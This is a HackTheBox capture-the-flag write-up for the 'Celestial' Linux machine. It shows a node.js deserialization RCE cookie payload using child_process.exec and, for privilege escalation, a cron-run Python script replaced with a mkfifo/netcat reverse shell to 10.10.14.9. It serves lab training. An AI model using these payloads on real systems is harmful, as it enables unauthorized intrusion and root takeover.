In this post we will resolve the machine Celestial from HackTheBox. It’s a low-level Linux Machine.

My nick in HackTheBox is: manulqwerty. If you have any proposal or correction do not hesitate to leave a comment.

Write-Up

Enumeration

As always, the first thing will be a port scan with Nmap:

nmap -sC -sV 10.10.10.85


We have a HTTP service on Port 3000, we will review it:

Let’s intercept the request with BurpSuite:

As you can see, the Cookie Profile appears to be encoded in Base 64, with the BurpSuite Decoder:

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}

If we change the value of the field ‘num’ by, for example, 4 and re-encode, we see that the answer will be:
Hey Dummy 4 + 4 is 44

Instead if we modify the cookie erroneously, we will get some more information:

Exploitation

Busquemos vulnerabilidades sobre las cookies en node.js
Let’s look for node.js cookies vulnerabilities

https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
Following the guide, we will be able to RCE with this value of the cookie:

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ping -c 10.10.14.16 /',function(error, stdout, stderr) { console.log(stdout) });\n }()"}


And with the help of the Reverse Shell Cheat-Sheet We will be able to obtain reverse shell easily:

Post-Exploitation

As you can see, the user with whom we obtain shell is part of some interesting groups:

Taking advantage of that we are part of the admGroup, we will be able to read the system logs:

cat /var/log/syslog


In this file we see that every 5 minutes is run as root file /home/sun/Documents/script.py
The next step is to edit the file with a reverse shell:

#!/usr/bin/env python
import os
import sys
try:
	os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 7777 >/tmp/f')
except:
	sys.exit()

¿Me ayudas a compatirlo?